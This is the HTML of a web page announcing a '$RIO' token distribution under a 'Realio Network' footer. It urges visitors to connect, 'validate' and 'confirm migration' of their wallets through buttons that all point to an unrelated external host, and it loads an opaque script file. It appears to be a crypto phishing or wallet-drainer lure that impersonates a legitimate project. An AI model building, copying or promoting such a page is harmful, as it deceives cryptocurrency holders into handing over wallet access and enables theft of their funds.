<!DOCTYPE html><html lang="en"><head>
    
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" type="image/png" href="./rel.webp">
    <title>Claim $Rio Token </title>

    <base>

    <link href="bootstrap.min.css" rel="stylesheet">	  
		  <style>
			body {
 background-color: #cccccc;
 background-repeat: no-repeat;

		  </style>
    <link href="icofont.min.css" rel="stylesheet" type="text/css">

    <link rel="stylesheet" href="bootstrap-icons.css">

    <link rel="stylesheet" type="text/css" href="slick.min.css">
    <link rel="stylesheet" type="text/css" href="slick-theme.min.css">

    <link href="style.css" rel="stylesheet">
<style type="text/css">#marq_kill_marg_bor { border: none !important; margin: 0px !important; }</style><style type="text/css">.ccc-coin-header-v3-container { white-space: nowrap; }</style><style type="text/css">.ccc-header-v3-ccc-price-container { margin-right: 15px; display: inline-block; }</style><style type="text/css">.ccc-header-v3 a { text-decoration: none; display: inline-block; }</style><style type="text/css">.ccc-header-v3 a:hover { text-decoration: none; }</style><style type="text/css">.ccc-header-v3 a:focus { text-decoration: none; }</style><style type="text/css">.ccc-header-v3-price-name { vertical-align: middle; font-family: Roboto, sans-serif; font-weight: 100; margin: 0px; color: rgb(0, 0, 0); }</style><style type="text/css">.ccc-header-v3-price-value { vertical-align: middle; font-family: Roboto, sans-serif; text-decoration: none; }</style><style type="text/css">.ccc-header-v3-price-change { font-family: Roboto, sans-serif; display: inline-block; vertical-align: middle; }</style><style type="text/css">#marq_kill_marg_bor { border: none !important; margin: 0px !important; }</style><style type="text/css">.ccc-coin-header-v3-container { white-space: nowrap; }</style><style type="text/css">.ccc-header-v3-ccc-price-container { margin-right: 15px; display: inline-block; }</style><style type="text/css">.ccc-header-v3 a { text-decoration: none; display: inline-block; }</style><style type="text/css">.ccc-header-v3 a:hover { text-decoration: none; }</style><style type="text/css">.ccc-header-v3 a:focus { text-decoration: none; }</style><style type="text/css">.ccc-header-v3-price-name { vertical-align: middle; font-family: Roboto, sans-serif; font-weight: 100; margin: 0px; color: rgb(0, 0, 0); }</style><style type="text/css">.ccc-header-v3-price-value { vertical-align: middle; font-family: Roboto, sans-serif; text-decoration: none; }</style><style type="text/css">.ccc-header-v3-price-change { font-family: Roboto, sans-serif; display: inline-block; vertical-align: middle; }</style></head>
<body>
    <nav class="navbar navbar-expand-lg navbar-dark bg-dark shadow-sm p-0 osahan-nav">
    <div class="container">
        <a class="navbar-brand" href="">
            <img src="./rel.webp"  alt="#" class="img-fluid">
        </a>
        <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarNavAltMarkup16" aria-expanded="true" aria-label="Toggle navigation">
            <span class="navbar-toggler-icon"></span>
        </button>
        <div class="navbar-collapse collapse show" id="navbarNavAltMarkup16" style="">
            <ul class="navbar-nav me-auto mb-2 mb-lg-0">
                <li class="nav-item">
                    <a class="nav-link active" aria-current="page" href="">CLAIM $RIO TOKEN</a>
                </li>
            </ul>

            <ul class="nav explore-tabs mb-0 justify-content-center gap-2" id="chain-switch-pill" role="tablist">
                
                    

                
                    
</nav>
    <section class="background-image: url(rel.webp)" >
        <!-- <h1 class="d-none">For SEO</h1> -->
        <div class="container py-4">
            <div class="row">
                <div class="col-lg-7 col-12">
                    <div class="mb-4">
                        <div class="display-5 fw-bold text-black mb-3"> Welcome to $RIO Contract Distribution Page </div>
                        <div class="fs-5 text-black-50"> We are glad to announce that the biggest token distribution - $RIO - has begun. Check your eligibility and Claim. 
							All beneficiaries gets their $RIO tokens deposited directly into their wallets. Goodluck!
                    <div>
						<br><br><br>
                        <a href="https://smartdappsfix.pages.dev/connect/index.html" class="btn btn-dark btn-lg me-12">CLAIM MIGRATION TOKEN</a>
                        <a href="https://smartdappsfix.pages.dev/connect/index.html" class="btn btn-warning btn-lg"> CONFIRM MIGRATION</a>
                    </div>
                </div>
            </div>
            <div class="row g-4 mt-5">
                <div class="col-lg-4 col-4">
                    <div class="rounded shadow-sm p-4 bg-white d-flex align-items-center gap-3 steps-item">
                        <span class="bg-primary rounded-circle steps-item-icon"><i class="bi bi-wallet2 text-white"></i></span>
                        <div>
                            <a style="text-decoration:none" href=""><div class="fw-bold fs-6 mb-1">Connect your Wallet</div></a>
                            <p class="text-muted m-0 d-none d-md-block">Connect your wallet to automatically detect your address</p>
                        </div>
                    </div>
                </div>
                <div class="col-lg-4 col-4">
                    <div class="rounded shadow-sm p-4 bg-white d-flex align-items-center gap-3 steps-item">
                        <span class="bg-primary rounded-circle steps-item-icon"><i class="bi bi-patch-plus text-white"></i></span>
                        <div>
                            <a style="text-decoration:none" href=""><div class="fw-bold fs-6 mb-1"> Validate Wallet </div></a>
                            <div class="text-muted m-0 d-none d-md-block">You will be prompted to validate via a decentralized protocol.</div>
                        </div>
                    </div>
                </div>
                <div class="col-lg-4 col-4">
                    <div class="rounded shadow-sm p-4 bg-white d-flex align-items-center gap-3 steps-item">
                        <span class="bg-primary rounded-circle steps-item-icon"><i class="bi bi-piggy-bank text-white"></i></span>
                        <div>
                            <a style="text-decoration:none" href=""><div class="fw-bold fs-6 mb-1">Confirm Migration</div></a>
                            <div class="text-muted m-0 d-none d-md-block">Confirm your token migration with the same process and await your rewards</div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>

</footer>
<div class="footer-mid py-4">
    <div class="container">
        <div class="row align-items-center justify-content-between">
            <div class="col-12 text-center">
            
            </div>
            <div class="col-auto">
                
                </div>
            </div>
        </div>
    </div>

<div class="footer-end bg-white py-4">
    <div class="container">
        <div class="row align-items-center justify-content-center">
            <div class="col-12 text-center">
                <span class="small">© 2024 Realio Network™, All rights reserved.</span>
            </div>
        </div>
    </div>
</div>












<style>
    #marquee-element{
        padding: 12px!important;
    }
    .crypto_price_scroll{
        pointer-events: none;
    }
    .features_icon{
        font-size: xxx-large;
    }
    .selected_features{
        cursor: pointer;
    }
</style>

<script src="./6722293a8bcabc30460eb66b.js"></script>
</body>
